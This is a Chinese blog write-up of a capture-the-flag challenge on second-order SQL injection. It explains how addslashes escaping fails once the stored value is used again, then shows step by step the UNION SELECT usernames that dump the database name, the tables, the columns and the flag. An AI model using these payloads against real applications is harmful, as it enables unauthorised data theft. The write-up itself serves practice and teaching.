当前位置:网站首页>October 2019 Twice SQL Injection
October 2019 Twice SQL Injection
2022-08-03 21:55:00 【茶经新读.】
October 2019 Twice SQL Injection
题目提示我们是二次注入(SQL注入(二次注入) - 知乎),二次注入漏洞是一种在Web应用程序中广泛存在的安全漏洞形式。
二次注入的原理:
在第一次进行数据库插入数据的时候,仅仅只是使用了addslashes或者是借助get_magic_quotes_gpc对其中的特殊字符进行了转义,但是addslashes有一个特点就是虽然参数在过滤后会添加"\"进行转义,但是"\"并不会插入到数据库中,再写入数据库的时候还是保留了原来的数据。
在将数据存入到了数据库中之后,开发者就认为数据是可信的。在下一次进行需要进行查询的时候直接从数据库中取除了“脏”数据,并没有进行进一步的检验和处理,这样就会造成SQL的二次注入。比如在第一次插入数据的时候,数据中有单引号,直接插入到了数据库中;然后再下一次使用中在拼凑的过程中就形成了二次注入。
随意注册一个账户然后登录,输入sql语句,发现服务器将我们的单引号用\转义,并没有过滤关键字
这时我们需要注册恶意用户名来登录获得我们想知道的内容
注册用户名为1' union select database() #,密码为a的用户
返回到登录页面输入刚才注册的用户名(1' union select database() #)和密码(a)
登录发现爆出了数据库ctftraining
使用同样的方法来爆表:用户名:1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' #,密码:a,注册登录
得到flag,news,users三个表
查一下flag表的字段:用户名:1' union select group_concat(column_name) from information_schema.columns where table_name='flag' #,密码:a,同样的注册登录
得到flag字段
查看一下flag字段的内容:用户名:1' union select flag from flag #,密码:a
得到flag
至此结束,撒花
边栏推荐
- 安全基础8 ---XSS
- 老板:公司系统太多,能不能实现账号互通?
- IO thread process -> thread synchronization mutual exclusion mechanism -> day6
- 中国企业构建边缘计算解决方案的最佳实践
- CAS:1260586-88-6_生物素-C5-叠氮_Biotin-C5-Azide
- STP生成树
- 电商数仓ODS层-----日志数据装载
- FVCOM三维水动力、水交换、溢油物质扩散及输运数值模拟丨FVCOM模型流域、海洋水环境数值模拟方法
- XSS testing
- [kali-vulnerability scanning] (2.1) Nessus lifts IP restrictions, scans quickly without results, and plugins are deleted (middle)
猜你喜欢
随机推荐
gtk实现图片旋转
XSS线上靶场---prompt
Makefile
Data_web(九)mongodb增量同步到mongodb
idea2021.1.3版本如何启动多个客户端程序
线上服务器老是卡,该如何优化?
CAS:1260586-88-6_生物素-C5-叠氮_Biotin-C5-Azide
趣链的产品构架
反射机制
CAS: 773888-45-2_BIOTIN ALKYNE_生物素-炔基
安全基础8 ---XSS
『百日百题 · 基础篇』备战面试,坚持刷题 第四话——循环语句!
XSS online shooting range---haozi
模板字符串
服务器安装redis
E - Swap
CAS:1260586-88-6_Biotin-C5-Azide_Biotin-C5-Azide
XSS漏洞复现
老板:公司系统太多,能不能实现账号互通?
2022年全国职业院校技能大赛网络安全 B模块 任务十windows操作系统渗透测试 国赛原题